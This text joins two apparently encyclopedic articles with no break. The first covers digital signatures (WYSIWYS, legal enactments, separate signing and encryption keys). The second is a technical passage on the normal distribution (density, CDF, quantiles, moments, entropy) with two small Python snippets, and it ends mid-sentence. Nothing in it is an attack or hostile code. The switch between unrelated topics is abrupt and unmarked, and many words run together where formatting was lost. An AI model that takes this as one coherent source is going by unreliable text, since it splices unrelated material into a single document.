WYSIWYS (What You See Is What You Sign)[40] means that the semantic interpretation of a signed message cannot be changed. In particular, this also means that a message cannot contain hidden information that the signer is unaware of, and that can be revealed after the signature has been applied. WYSIWYS is a requirement for the validity of digital signatures, but this requirement is difficult to guarantee because of the increasing complexity of modern computer systems. The term WYSIWYS was coined by Peter Landrock and Torben Pedersen to describe some of the principles in delivering secure and legally binding digital signatures for Pan-European projects.[40] An ink signature could be replicated from one document to another by copying the image manually or digitally, but producing credible signature copies that can resist some scrutiny requires significant manual or technical skill, and producing ink signature copies that resist professional scrutiny is very difficult. Digital signatures cryptographically bind an electronic identity to an electronic document, and the digital signature cannot be copied to another document. Paper contracts sometimes have the ink signature block on the last page, and the previous pages may be replaced after a signature is applied. Digital signatures can be applied to an entire document, such that the digital signature on the last page will indicate tampering if any data on any of the pages have been altered, but this can also be achieved by signing with ink and numbering all pages of the contract. Most digital signature schemes share the following goals regardless of cryptographic theory or legal provision: broadly, they require quality algorithms and quality implementations, that the private key remain secret, that the owner of the public key be verifiable (for example through a public key infrastructure), and that users and their software carry out the signature protocol properly. Only if all of these conditions are met will a digital signature actually be any evidence of who sent the message, and therefore of their assent to its contents. Legal enactment cannot change this reality of the existing engineering possibilities, though some enactments have not reflected this reality. Legislatures, being importuned by businesses expecting to profit from operating a PKI, or by the technological avant-garde advocating new solutions to old problems, have enacted statutes and/or regulations in many jurisdictions authorizing, endorsing, encouraging, or permitting digital signatures and providing for (or limiting) their legal effect. The first appears to have been in Utah in the United States, followed closely by the states Massachusetts and California. Other countries have also passed statutes or issued regulations in this area, and the UN has had an active model law project for some time. These enactments (or proposed enactments) vary from place to place, have typically embodied expectations at variance (optimistically or pessimistically) with the state of the underlying cryptographic engineering, and have had the net effect of confusing potential users and specifiers, nearly all of whom are not cryptographically knowledgeable. Adoption of technical standards for digital signatures has lagged behind much of the legislation, delaying a more or less unified engineering position on interoperability, algorithm choice, key lengths, and other aspects of what the engineering is attempting to provide. Some industries have established common interoperability standards for the use of digital signatures between members of the industry and with regulators. These include the Automotive Network Exchange for the automobile industry and the SAFE-BioPharma Association for the healthcare industry.
In several countries, a digital signature has a status somewhat like that of a traditional pen and paper signature, as in the 1999 EU digital signature directive and the 2014 EU follow-on legislation.[15] Generally, these provisions mean that anything digitally signed legally binds the signer of the document to the terms therein. For that reason, it is often thought best to use separate key pairs for encrypting and signing. Using the encryption key pair, a person can engage in an encrypted conversation (e.g., regarding a real estate transaction), but the encryption does not legally sign every message he or she sends. Only when both parties come to an agreement do they sign a contract with their signing keys, and only then are they legally bound by the terms of a specific document. After signing, the document can be sent over the encrypted link. If a signing key is lost or compromised, it can be revoked to limit the damage from any future transactions signed with it. If an encryption key is lost, a backup or key escrow should be used so that encrypted content can still be viewed. Signing keys should never be backed up or escrowed unless the backup destination is securely encrypted.
In probability theory and statistics, a normal distribution or Gaussian distribution is a type of continuous probability distribution for a real-valued random variable. The general form of its probability density function is[2][3] {\displaystyle f(x)={\frac {1}{\sqrt {2\pi \sigma ^{2}}}}e^{-{\frac {(x-\mu )^{2}}{2\sigma ^{2}}}}\,.} The parameter μ is the mean or expectation of the distribution (and also its median and mode), while the parameter σ² is the variance. The standard deviation of the distribution is σ (sigma). A random variable with a Gaussian distribution is said to be normally distributed, and is called a normal deviate. Normal distributions are important in statistics and are often used in the natural and social sciences to represent real-valued random variables whose distributions are not known.[4][5] Their importance is partly due to the central limit theorem. It states that, under some conditions, the average of many samples (observations) of a random variable with finite mean and variance is itself a random variable whose distribution converges to a normal distribution as the number of samples increases. Therefore, physical quantities that are expected to be the sum of many independent processes, such as measurement errors, often have distributions that are nearly normal.[6] Moreover, Gaussian distributions have some unique properties that are valuable in analytic studies. For instance, any linear combination of a fixed collection of independent normal deviates is a normal deviate. Many results and methods, such as propagation of uncertainty and least squares[7] parameter fitting, can be derived analytically in explicit form when the relevant variables are normally distributed. A normal distribution is sometimes informally called a bell curve.[8] However, many other distributions are bell-shaped (such as the Cauchy, Student's t, and logistic distributions). (For other names, see Naming.) The univariate probability distribution is generalized for vectors in the multivariate normal distribution and for matrices in the matrix normal distribution. The simplest case of a normal distribution is known as the standard normal distribution or unit normal distribution. This is a special case when μ = 0 and σ² = 1, and it is described by this probability density function (or density): {\displaystyle \varphi (z)={\frac {e^{-z^{2}/2}}{\sqrt {2\pi }}}\,.} The variable z has a mean of 0 and a variance and standard deviation of 1. The density φ(z) has its peak 1/√(2π) at z = 0 and inflection points at z = +1 and z = −1.
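As a quick numerical illustration of these densities, the following sketch (plain Python, standard library only; the example parameter values are arbitrary) evaluates the general and standard normal probability density functions:

```python
import math

def normal_pdf(x, mu=0.0, sigma=1.0):
    """Density of the normal distribution N(mu, sigma^2) evaluated at x."""
    z = (x - mu) / sigma
    return math.exp(-0.5 * z * z) / (sigma * math.sqrt(2.0 * math.pi))

# The standard normal density peaks at 1/sqrt(2*pi), about 0.3989, at z = 0.
print(normal_pdf(0.0))
print(1.0 / math.sqrt(2.0 * math.pi))

# A non-standard example: N(mu=170, sigma=10) evaluated at x = 175.
print(normal_pdf(175.0, mu=170.0, sigma=10.0))
```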
Although the density above is most commonly known as thestandard normal,a few authors have used that term to describe other versions of the normal distribution.Carl Friedrich Gauss, for example, once defined the standard normal asφ(z)=e−z2π,{\displaystyle \varphi (z)={\frac {e^{-z^{2}}}{\sqrt {\pi }}},}which has a variance of⁠12{\displaystyle {\frac {1}{2}}}⁠, andStephen Stigler[9]once defined the standard normal asφ(z)=e−πz2,{\displaystyle \varphi (z)=e^{-\pi z^{2}},}which has a simple functional form and a variance ofσ2=12π.{\textstyle \sigma ^{2}={\frac {1}{2\pi }}.} Every normal distribution is a version of the standard normal distribution, whose domain has been stretched by a factor⁠σ{\displaystyle \sigma }⁠(the standard deviation) and then translated by⁠μ{\displaystyle \mu }⁠(the mean value): f(x∣μ,σ2)=1σφ(x−μσ).{\displaystyle f(x\mid \mu ,\sigma ^{2})={\frac {1}{\sigma }}\varphi \left({\frac {x-\mu }{\sigma }}\right)\,.} The probability density must be scaled by1/σ{\textstyle 1/\sigma }so that theintegralis still 1. If⁠Z{\displaystyle Z}⁠is astandard normal deviate, thenX=σZ+μ{\textstyle X=\sigma Z+\mu }will have a normal distribution with expected value⁠μ{\displaystyle \mu }⁠and standard deviation⁠σ{\displaystyle \sigma }⁠. This is equivalent to saying that the standard normal distribution⁠Z{\displaystyle Z}⁠can be scaled/stretched by a factor of⁠σ{\displaystyle \sigma }⁠and shifted by⁠μ{\displaystyle \mu }⁠to yield a different normal distribution, called⁠X{\displaystyle X}⁠. Conversely, if⁠X{\displaystyle X}⁠is a normal deviate with parameters⁠μ{\displaystyle \mu }⁠andσ2{\textstyle \sigma ^{2}}, then this⁠X{\displaystyle X}⁠distribution can be re-scaled and shifted via the formulaZ=(X−μ)/σ{\textstyle Z=(X-\mu )/\sigma }to convert it to the standard normal distribution. This variate is also called the standardized form of⁠X{\displaystyle X}⁠. The probability density of the standard Gaussian distribution (standard normal distribution, with zero mean and unit variance) is often denoted with the Greek letter⁠ϕ{\displaystyle \phi }⁠(phi).[10]The alternative form of the Greek letter phi,⁠φ{\displaystyle \varphi }⁠, is also used quite often. The normal distribution is often referred to asN(μ,σ2){\textstyle N(\mu ,\sigma ^{2})}or⁠N(μ,σ2){\displaystyle {\mathcal {N}}(\mu ,\sigma ^{2})}⁠.[11]Thus when a random variable⁠X{\displaystyle X}⁠is normally distributed with mean⁠μ{\displaystyle \mu }⁠and standard deviation⁠σ{\displaystyle \sigma }⁠, one may write X∼N(μ,σ2).{\displaystyle X\sim {\mathcal {N}}(\mu ,\sigma ^{2}).} Some authors advocate using theprecision⁠τ{\displaystyle \tau }⁠as the parameter defining the width of the distribution, instead of the standard deviation⁠σ{\displaystyle \sigma }⁠or the variance⁠σ2{\displaystyle \sigma ^{2}}⁠. The precision is normally defined as the reciprocal of the variance,⁠1/σ2{\displaystyle 1/\sigma ^{2}}⁠.[12]The formula for the distribution then becomes f(x)=τ2πe−τ(x−μ)2/2.{\displaystyle f(x)={\sqrt {\frac {\tau }{2\pi }}}e^{-\tau (x-\mu )^{2}/2}.} This choice is claimed to have advantages in numerical computations when⁠σ{\displaystyle \sigma }⁠is very close to zero, and simplifies formulas in some contexts, such as in theBayesian inferenceof variables withmultivariate normal distribution. 
Alternatively, the reciprocal of the standard deviationτ′=1/σ{\textstyle \tau '=1/\sigma }might be defined as theprecision, in which case the expression of the normal distribution becomes f(x)=τ′2πe−(τ′)2(x−μ)2/2.{\displaystyle f(x)={\frac {\tau '}{\sqrt {2\pi }}}e^{-(\tau ')^{2}(x-\mu )^{2}/2}.} According to Stigler, this formulation is advantageous because of a much simpler and easier-to-remember formula, and simple approximate formulas for thequantilesof the distribution. Normal distributions form anexponential familywithnatural parametersθ1=μσ2{\textstyle \textstyle \theta _{1}={\frac {\mu }{\sigma ^{2}}}}andθ2=−12σ2{\textstyle \textstyle \theta _{2}={\frac {-1}{2\sigma ^{2}}}}, and natural statisticsxandx2. The dual expectation parameters for normal distribution areη1=μandη2=μ2+σ2. Thecumulative distribution function(CDF) of the standard normal distribution, usually denoted with the capital Greek letter⁠Φ{\displaystyle \Phi }⁠, is the integral Φ(x)=12π∫−∞xe−t2/2dt.{\displaystyle \Phi (x)={\frac {1}{\sqrt {2\pi }}}\int _{-\infty }^{x}e^{-t^{2}/2}\,dt\,.} The relatederror functionerf⁡(x){\textstyle \operatorname {erf} (x)}gives the probability of a random variable, with normal distribution of mean 0 and variance 1/2 falling in the range⁠[−x,x]{\displaystyle [-x,x]}⁠. That is: erf⁡(x)=1π∫−xxe−t2dt=2π∫0xe−t2dt.{\displaystyle \operatorname {erf} (x)={\frac {1}{\sqrt {\pi }}}\int _{-x}^{x}e^{-t^{2}}\,dt={\frac {2}{\sqrt {\pi }}}\int _{0}^{x}e^{-t^{2}}\,dt\,.} These integrals cannot be expressed in terms of elementary functions, and are often said to bespecial functions. However, many numerical approximations are known; seebelowfor more. The two functions are closely related, namely Φ(x)=12[1+erf⁡(x2)].{\displaystyle \Phi (x)={\frac {1}{2}}\left[1+\operatorname {erf} \left({\frac {x}{\sqrt {2}}}\right)\right]\,.} For a generic normal distribution with density⁠f{\displaystyle f}⁠, mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}, the cumulative distribution function is F(x)=Φ(x−μσ)=12[1+erf⁡(x−μσ2)].{\displaystyle F(x)=\Phi {\left({\frac {x-\mu }{\sigma }}\right)}={\frac {1}{2}}\left[1+\operatorname {erf} \left({\frac {x-\mu }{\sigma {\sqrt {2}}}}\right)\right]\,.} The complement of the standard normal cumulative distribution function,Q(x)=1−Φ(x){\textstyle Q(x)=1-\Phi (x)}, is often called theQ-function, especially in engineering texts.[13][14]It gives the probability that the value of a standard normal random variable⁠X{\displaystyle X}⁠will exceed⁠x{\displaystyle x}⁠:⁠P(X>x){\displaystyle P(X>x)}⁠. Other definitions of the⁠Q{\displaystyle Q}⁠-function, all of which are simple transformations of⁠Φ{\displaystyle \Phi }⁠, are also used occasionally.[15] Thegraphof the standard normal cumulative distribution function⁠Φ{\displaystyle \Phi }⁠has 2-foldrotational symmetryaround the point (0,1/2); that is,⁠Φ(−x)=1−Φ(x){\displaystyle \Phi (-x)=1-\Phi (x)}⁠. Itsantiderivative(indefinite integral) can be expressed as follows:∫Φ(x)dx=xΦ(x)+φ(x)+C.{\displaystyle \int \Phi (x)\,dx=x\Phi (x)+\varphi (x)+C.} The cumulative distribution function of the standard normal distribution can be expanded byintegration by partsinto a series: Φ(x)=12+12π⋅e−x2/2[x+x33+x53⋅5+⋯+x2n+1(2n+1)!!+⋯].{\displaystyle \Phi (x)={\frac {1}{2}}+{\frac {1}{\sqrt {2\pi }}}\cdot e^{-x^{2}/2}\left[x+{\frac {x^{3}}{3}}+{\frac {x^{5}}{3\cdot 5}}+\cdots +{\frac {x^{2n+1}}{(2n+1)!!}}+\cdots \right]\,.} where!!{\textstyle !!}denotes thedouble factorial. 
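Because most standard math libraries expose the error function, the identity relating Φ and erf above gives a practical way to evaluate the cumulative distribution function; a minimal sketch in Python:

```python
import math

def standard_normal_cdf(x):
    """Phi(x) computed via the identity Phi(x) = (1 + erf(x / sqrt(2))) / 2."""
    return 0.5 * (1.0 + math.erf(x / math.sqrt(2.0)))

def normal_cdf(x, mu=0.0, sigma=1.0):
    """CDF of N(mu, sigma^2), obtained by standardizing and reusing Phi."""
    return standard_normal_cdf((x - mu) / sigma)

print(standard_normal_cdf(0.0))              # 0.5 by symmetry
print(standard_normal_cdf(1.96))             # about 0.975
print(normal_cdf(12.0, mu=10.0, sigma=2.0))  # about 0.841
```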
An asymptotic expansion of the cumulative distribution function for large x can also be derived using integration by parts. For more, see Error function § Asymptotic expansion.[16] A quick approximation to the standard normal distribution's cumulative distribution function can be found by using a Taylor series approximation: {\displaystyle \Phi (x)\approx {\frac {1}{2}}+{\frac {1}{\sqrt {2\pi }}}\sum _{k=0}^{n}{\frac {(-1)^{k}x^{(2k+1)}}{2^{k}k!(2k+1)}}\,.} The recursive nature of the {\textstyle e^{ax^{2}}} family of derivatives may be used to easily construct a rapidly converging Taylor series expansion using recursive entries about any point of known value of the distribution, Φ(x₀): {\displaystyle \Phi (x)=\sum _{n=0}^{\infty }{\frac {\Phi ^{(n)}(x_{0})}{n!}}(x-x_{0})^{n}\,,} where: {\displaystyle {\begin{aligned}\Phi ^{(0)}(x_{0})&={\frac {1}{\sqrt {2\pi }}}\int _{-\infty }^{x_{0}}e^{-t^{2}/2}\,dt\\\Phi ^{(1)}(x_{0})&={\frac {1}{\sqrt {2\pi }}}e^{-x_{0}^{2}/2}\\\Phi ^{(n)}(x_{0})&=-\left(x_{0}\Phi ^{(n-1)}(x_{0})+(n-2)\Phi ^{(n-2)}(x_{0})\right),&n\geq 2\,.\end{aligned}}} This Taylor series expansion can be combined with Newton's method to reverse the computation: if we have a value of the cumulative distribution function, Φ(x), but do not know the x needed to obtain it, Newton's method can be used to find x, with the Taylor series expansion above used to minimize the number of computations. Newton's method is well suited to this problem because the first derivative of Φ(x) is simply the standard normal density (Φ is the integral of that density), which is readily available for use in the Newton iteration. To solve, select a known approximate solution, x₀, to the desired Φ(x); x₀ may be a value from a distribution table, or an intelligent estimate followed by a computation of Φ(x₀) using any desired means. Use this value of x₀ and the Taylor series expansion above to minimize computations. Repeat the following process until the difference between the computed Φ(xₙ) and the desired value, which we will call Φ(desired), is below a chosen acceptably small error, such as 10−5 or 10−15: {\displaystyle x_{n+1}=x_{n}-{\frac {\Phi (x_{n},x_{0},\Phi (x_{0}))-\Phi ({\text{desired}})}{\Phi '(x_{n})}}\,,} where {\displaystyle \Phi '(x_{n})={\frac {1}{\sqrt {2\pi }}}e^{-x_{n}^{2}/2}\,.} When the repeated computations converge to an error below the chosen acceptably small value, x will be the value needed to obtain a Φ(x) of the desired value, Φ(desired). About 68% of values drawn from a normal distribution are within one standard deviation σ from the mean; about 95% of the values lie within two standard deviations; and about 99.7% are within three standard deviations.[8] This fact is known as the 68–95–99.7 (empirical) rule, or the 3-sigma rule.
More precisely, the probability that a normal deviate lies in the range betweenμ−nσ{\textstyle \mu -n\sigma }andμ+nσ{\textstyle \mu +n\sigma }is given byF(μ+nσ)−F(μ−nσ)=Φ(n)−Φ(−n)=erf⁡(n2).{\displaystyle F(\mu +n\sigma )-F(\mu -n\sigma )=\Phi (n)-\Phi (-n)=\operatorname {erf} \left({\frac {n}{\sqrt {2}}}\right).}To 12 significant digits, the values forn=1,2,…,6{\textstyle n=1,2,\ldots ,6}are: For large⁠n{\displaystyle n}⁠, one can use the approximation1−p≈e−n2/2nπ/2{\textstyle 1-p\approx {\frac {e^{-n^{2}/2}}{n{\sqrt {\pi /2}}}}}. Thequantile functionof a distribution is the inverse of the cumulative distribution function. The quantile function of the standard normal distribution is called theprobit function, and can be expressed in terms of the inverseerror function:Φ−1(p)=2erf−1⁡(2p−1),p∈(0,1).{\displaystyle \Phi ^{-1}(p)={\sqrt {2}}\operatorname {erf} ^{-1}(2p-1),\quad p\in (0,1).}For a normal random variable with mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}, the quantile function isF−1(p)=μ+σΦ−1(p)=μ+σ2erf−1⁡(2p−1),p∈(0,1).{\displaystyle F^{-1}(p)=\mu +\sigma \Phi ^{-1}(p)=\mu +\sigma {\sqrt {2}}\operatorname {erf} ^{-1}(2p-1),\quad p\in (0,1).}ThequantileΦ−1(p){\textstyle \Phi ^{-1}(p)}of the standard normal distribution is commonly denoted as⁠zp{\displaystyle z_{p}}⁠. These values are used inhypothesis testing, construction ofconfidence intervalsandQ–Q plots. A normal random variable⁠X{\displaystyle X}⁠will exceedμ+zpσ{\textstyle \mu +z_{p}\sigma }with probability1−p{\textstyle 1-p}, and will lie outside the intervalμ±zpσ{\textstyle \mu \pm z_{p}\sigma }with probability⁠2(1−p){\displaystyle 2(1-p)}⁠. In particular, the quantilez0.975{\textstyle z_{0.975}}is1.96; therefore a normal random variable will lie outside the intervalμ±1.96σ{\textstyle \mu \pm 1.96\sigma }in only 5% of cases. The following table gives the quantilezp{\textstyle z_{p}}such that⁠X{\displaystyle X}⁠will lie in the rangeμ±zpσ{\textstyle \mu \pm z_{p}\sigma }with a specified probability⁠p{\displaystyle p}⁠. These values are useful to determinetolerance intervalforsample averagesand other statisticalestimatorswith normal (orasymptoticallynormal) distributions.[17]The following table shows2erf−1⁡(p)=Φ−1(p+12){\textstyle {\sqrt {2}}\operatorname {erf} ^{-1}(p)=\Phi ^{-1}\left({\frac {p+1}{2}}\right)}, notΦ−1(p){\textstyle \Phi ^{-1}(p)}as defined above. For small⁠p{\displaystyle p}⁠, the quantile function has the usefulasymptotic expansionΦ−1(p)=−ln⁡1p2−ln⁡ln⁡1p2−ln⁡(2π)+o(1).{\textstyle \Phi ^{-1}(p)=-{\sqrt {\ln {\frac {1}{p^{2}}}-\ln \ln {\frac {1}{p^{2}}}-\ln(2\pi )}}+{\mathcal {o}}(1).}[citation needed] The normal distribution is the only distribution whosecumulantsbeyond the first two (i.e., other than the mean andvariance) are zero. It is also the continuous distribution with themaximum entropyfor a specified mean and variance.[18][19]Geary has shown, assuming that the mean and variance are finite, that the normal distribution is the only distribution where the mean and variance calculated from a set of independent draws are independent of each other.[20][21] The normal distribution is a subclass of theelliptical distributions. The normal distribution issymmetricabout its mean, and is non-zero over the entire real line. As such it may not be a suitable model for variables that are inherently positive or strongly skewed, such as theweightof a person or the price of ashare. 
Such variables may be better described by other distributions, such as thelog-normal distributionor thePareto distribution. The value of the normal density is practically zero when the value⁠x{\displaystyle x}⁠lies more than a fewstandard deviationsaway from the mean (e.g., a spread of three standard deviations covers all but 0.27% of the total distribution). Therefore, it may not be an appropriate model when one expects a significant fraction ofoutliers—values that lie many standard deviations away from the mean—and least squares and otherstatistical inferencemethods that are optimal for normally distributed variables often become highly unreliable when applied to such data. In those cases, a moreheavy-taileddistribution should be assumed and the appropriaterobust statistical inferencemethods applied. The Gaussian distribution belongs to the family ofstable distributionswhich are the attractors of sums ofindependent, identically distributeddistributions whether or not the mean or variance is finite. Except for the Gaussian which is a limiting case, all stable distributions have heavy tails and infinite variance. It is one of the few distributions that are stable and that have probability density functions that can be expressed analytically, the others being theCauchy distributionand theLévy distribution. The normal distribution with densityf(x){\textstyle f(x)}(mean⁠μ{\displaystyle \mu }⁠and varianceσ2>0{\textstyle \sigma ^{2}>0}) has the following properties: Furthermore, the density⁠φ{\displaystyle \varphi }⁠of the standard normal distribution (i.e.μ=0{\textstyle \mu =0}andσ=1{\textstyle \sigma =1}) also has the following properties: The plain and absolutemomentsof a variable⁠X{\displaystyle X}⁠are the expected values ofXp{\textstyle X^{p}}and|X|p{\textstyle |X|^{p}}, respectively. If the expected value⁠μ{\displaystyle \mu }⁠of⁠X{\displaystyle X}⁠is zero, these parameters are calledcentral moments;otherwise, these parameters are callednon-central moments.Usually we are interested only in moments with integer order⁠p{\displaystyle p}⁠. If⁠X{\displaystyle X}⁠has a normal distribution, the non-central moments exist and are finite for any⁠p{\displaystyle p}⁠whose real part is greater than −1. For any non-negative integer⁠p{\displaystyle p}⁠, the plain central moments are:[25]E⁡[(X−μ)p]={0ifpis odd,σp(p−1)!!ifpis even.{\displaystyle \operatorname {E} \left[(X-\mu )^{p}\right]={\begin{cases}0&{\text{if }}p{\text{ is odd,}}\\\sigma ^{p}(p-1)!!&{\text{if }}p{\text{ is even.}}\end{cases}}}Heren!!{\textstyle n!!}denotes thedouble factorial, that is, the product of all numbers from⁠n{\displaystyle n}⁠to 1 that have the same parity asn.{\textstyle n.} The central absolute moments coincide with plain moments for all even orders, but are nonzero for odd orders. 
For any non-negative integerp,{\textstyle p,} E⁡[|X−μ|p]=σp(p−1)!!⋅{2πifpis odd1ifpis even=σp⋅2p/2Γ(p+12)π.{\displaystyle {\begin{aligned}\operatorname {E} \left[|X-\mu |^{p}\right]&=\sigma ^{p}(p-1)!!\cdot {\begin{cases}{\sqrt {\frac {2}{\pi }}}&{\text{if }}p{\text{ is odd}}\\1&{\text{if }}p{\text{ is even}}\end{cases}}\\&=\sigma ^{p}\cdot {\frac {2^{p/2}\Gamma \left({\frac {p+1}{2}}\right)}{\sqrt {\pi }}}.\end{aligned}}}The last formula is valid also for any non-integerp>−1.{\textstyle p>-1.}When the meanμ≠0,{\textstyle \mu \neq 0,}the plain and absolute moments can be expressed in terms ofconfluent hypergeometric functions1F1{\textstyle {}_{1}F_{1}}andU.{\textstyle U.}[26] E⁡[Xp]=σp⋅(−i2)pU(−p2,12,−μ22σ2),E⁡[|X|p]=σp⋅2p/2Γ(1+p2)π1F1(−p2,12,−μ22σ2).{\displaystyle {\begin{aligned}\operatorname {E} \left[X^{p}\right]&=\sigma ^{p}\cdot {\left(-i{\sqrt {2}}\right)}^{p}\,U{\left(-{\frac {p}{2}},{\frac {1}{2}},-{\frac {\mu ^{2}}{2\sigma ^{2}}}\right)},\\\operatorname {E} \left[|X|^{p}\right]&=\sigma ^{p}\cdot 2^{p/2}{\frac {\Gamma {\left({\frac {1+p}{2}}\right)}}{\sqrt {\pi }}}\,{}_{1}F_{1}{\left(-{\frac {p}{2}},{\frac {1}{2}},-{\frac {\mu ^{2}}{2\sigma ^{2}}}\right)}.\end{aligned}}} These expressions remain valid even if⁠p{\displaystyle p}⁠is not an integer. See alsogeneralized Hermite polynomials. The expectation of⁠X{\displaystyle X}⁠conditioned on the event that⁠X{\displaystyle X}⁠lies in an interval[a,b]{\textstyle [a,b]}is given byE⁡[X∣a<X<b]=μ−σ2f(b)−f(a)F(b)−F(a),{\displaystyle \operatorname {E} \left[X\mid a<X<b\right]=\mu -\sigma ^{2}{\frac {f(b)-f(a)}{F(b)-F(a)}}\,,}where⁠f{\displaystyle f}⁠and⁠F{\displaystyle F}⁠respectively are the density and the cumulative distribution function of⁠X{\displaystyle X}⁠. Forb=∞{\textstyle b=\infty }this is known as theinverse Mills ratio. Note that above, density⁠f{\displaystyle f}⁠of⁠X{\displaystyle X}⁠is used instead of standard normal density as in inverse Mills ratio, so here we haveσ2{\textstyle \sigma ^{2}}instead of⁠σ{\displaystyle \sigma }⁠. TheFourier transformof a normal density⁠f{\displaystyle f}⁠with mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}is[27] f^(t)=∫−∞∞f(x)e−itxdx=e−iμte−12(σt)2,{\displaystyle {\hat {f}}(t)=\int _{-\infty }^{\infty }f(x)e^{-itx}\,dx=e^{-i\mu t}e^{-{\frac {1}{2}}(\sigma t)^{2}}\,,} where⁠i{\displaystyle i}⁠is theimaginary unit. If the meanμ=0{\textstyle \mu =0}, the first factor is 1, and the Fourier transform is, apart from a constant factor, a normal density on thefrequency domain, with mean 0 and variance⁠1/σ2{\displaystyle 1/\sigma ^{2}}⁠. In particular, the standard normal distribution⁠φ{\displaystyle \varphi }⁠is aneigenfunctionof the Fourier transform. In probability theory, the Fourier transform of the probability distribution of a real-valued random variable⁠X{\displaystyle X}⁠is closely connected to thecharacteristic functionφX(t){\textstyle \varphi _{X}(t)}of that variable, which is defined as theexpected valueofeitX{\textstyle e^{itX}}, as a function of the real variable⁠t{\displaystyle t}⁠(thefrequencyparameter of the Fourier transform). This definition can be analytically extended to a complex-value variable⁠t{\displaystyle t}⁠.[28]The relation between both is:φX(t)=f^(−t).{\displaystyle \varphi _{X}(t)={\hat {f}}(-t)\,.} Themoment generating functionof a real random variable⁠X{\displaystyle X}⁠is the expected value ofetX{\textstyle e^{tX}}, as a function of the real parameter⁠t{\displaystyle t}⁠. 
For a normal distribution with density⁠f{\displaystyle f}⁠, mean⁠μ{\displaystyle \mu }⁠and varianceσ2{\textstyle \sigma ^{2}}, the moment generating function exists and is equal to M(t)=E⁡[etX]=f^(it)=eμteσ2t2/2.{\displaystyle M(t)=\operatorname {E} \left[e^{tX}\right]={\hat {f}}(it)=e^{\mu t}e^{\sigma ^{2}t^{2}/2}\,.}For any⁠k{\displaystyle k}⁠, the coefficient of⁠tk/k!{\displaystyle t^{k}/k!}⁠in the moment generating function (expressed as anexponential power seriesin⁠t{\displaystyle t}⁠) is the normal distribution's expected value⁠E⁡[Xk]{\displaystyle \operatorname {E} [X^{k}]}⁠. Thecumulant generating functionis the logarithm of the moment generating function, namely g(t)=ln⁡M(t)=μt+12σ2t2.{\displaystyle g(t)=\ln M(t)=\mu t+{\tfrac {1}{2}}\sigma ^{2}t^{2}\,.} The coefficients of this exponential power series define the cumulants, but because this is a quadratic polynomial in⁠t{\displaystyle t}⁠, only the first twocumulantsare nonzero, namely the mean⁠μ{\displaystyle \mu }⁠and the variance⁠σ2{\displaystyle \sigma ^{2}}⁠. Some authors prefer to instead work with thecharacteristic functionE[eitX] =eiμt−σ2t2/2andln E[eitX] =iμt−⁠1/2⁠σ2t2. WithinStein's methodthe Stein operator and class of a random variableX∼N(μ,σ2){\textstyle X\sim {\mathcal {N}}(\mu ,\sigma ^{2})}areAf(x)=σ2f′(x)−(x−μ)f(x){\textstyle {\mathcal {A}}f(x)=\sigma ^{2}f'(x)-(x-\mu )f(x)}andF{\textstyle {\mathcal {F}}}the class of all absolutely continuous functions⁠f:R→R{\displaystyle \textstyle f:\mathbb {R} \to \mathbb {R} }⁠such that⁠E⁡[|f′(X)|]<∞{\displaystyle \operatorname {E} [\vert f'(X)\vert ]<\infty }⁠. In thelimitwhenσ2{\textstyle \sigma ^{2}}tends to zero, the probability densityf(x){\textstyle f(x)}eventually tends to zero at anyx≠μ{\textstyle x\neq \mu }, but grows without limit ifx=μ{\textstyle x=\mu }, while its integral remains equal to 1. Therefore, the normal distribution cannot be defined as an ordinaryfunctionwhen⁠σ2=0{\displaystyle \sigma ^{2}=0}⁠. However, one can define the normal distribution with zero variance as ageneralized function; specifically, as aDirac delta function⁠δ{\displaystyle \delta }⁠translated by the mean⁠μ{\displaystyle \mu }⁠, that isf(x)=δ(x−μ).{\textstyle f(x)=\delta (x-\mu ).}Its cumulative distribution function is then theHeaviside step functiontranslated by the mean⁠μ{\displaystyle \mu }⁠, namelyF(x)={0ifx<μ1ifx≥μ.{\displaystyle F(x)={\begin{cases}0&{\text{if }}x<\mu \\1&{\text{if }}x\geq \mu \,.\end{cases}}} Of all probability distributions over the reals with a specified finite mean⁠μ{\displaystyle \mu }⁠and finite variance⁠σ2{\displaystyle \sigma ^{2}}⁠, the normal distributionN(μ,σ2){\textstyle N(\mu ,\sigma ^{2})}is the one withmaximum entropy.[29]To see this, let⁠X{\displaystyle X}⁠be acontinuous random variablewithprobability density⁠f(x){\displaystyle f(x)}⁠. The entropy of⁠X{\displaystyle X}⁠is defined as[30][31][32]H(X)=−∫−∞∞f(x)ln⁡f(x)dx,{\displaystyle H(X)=-\int _{-\infty }^{\infty }f(x)\ln f(x)\,dx\,,} wheref(x)log⁡f(x){\textstyle f(x)\log f(x)}is understood to be zero whenever⁠f(x)=0{\displaystyle f(x)=0}⁠. This functional can be maximized, subject to the constraints that the distribution is properly normalized and has a specified mean and variance, by usingvariational calculus. 
A function with threeLagrange multipliersis defined: L=−∫−∞∞f(x)ln⁡f(x)dx−λ0(1−∫−∞∞f(x)dx)−λ1(μ−∫−∞∞f(x)xdx)−λ2(σ2−∫−∞∞f(x)(x−μ)2dx).{\displaystyle L=-\int _{-\infty }^{\infty }f(x)\ln f(x)\,dx-\lambda _{0}\left(1-\int _{-\infty }^{\infty }f(x)\,dx\right)-\lambda _{1}\left(\mu -\int _{-\infty }^{\infty }f(x)x\,dx\right)-\lambda _{2}\left(\sigma ^{2}-\int _{-\infty }^{\infty }f(x)(x-\mu )^{2}\,dx\right)\,.} At maximum entropy, a small variationδf(x){\textstyle \delta f(x)}aboutf(x){\textstyle f(x)}will produce a variationδL{\textstyle \delta L}about⁠L{\displaystyle L}⁠which is equal to 0: 0=δL=∫−∞∞δf(x)(−ln⁡f(x)−1+λ0+λ1x+λ2(x−μ)2)dx.{\displaystyle 0=\delta L=\int _{-\infty }^{\infty }\delta f(x)\left(-\ln f(x)-1+\lambda _{0}+\lambda _{1}x+\lambda _{2}(x-\mu )^{2}\right)\,dx\,.} Since this must hold for any small⁠δf(x){\displaystyle \delta f(x)}⁠, the factor multiplying⁠δf(x){\displaystyle \delta f(x)}⁠must be zero, and solving for⁠f(x){\displaystyle f(x)}⁠yields: f(x)=exp⁡(−1+λ0+λ1x+λ2(x−μ)2).{\displaystyle f(x)=\exp \left(-1+\lambda _{0}+\lambda _{1}x+\lambda _{2}(x-\mu )^{2}\right)\,.} The Lagrange constraints that⁠f(x){\displaystyle f(x)}⁠is properly normalized and has the specified mean and variance are satisfied if and only if⁠λ0{\displaystyle \lambda 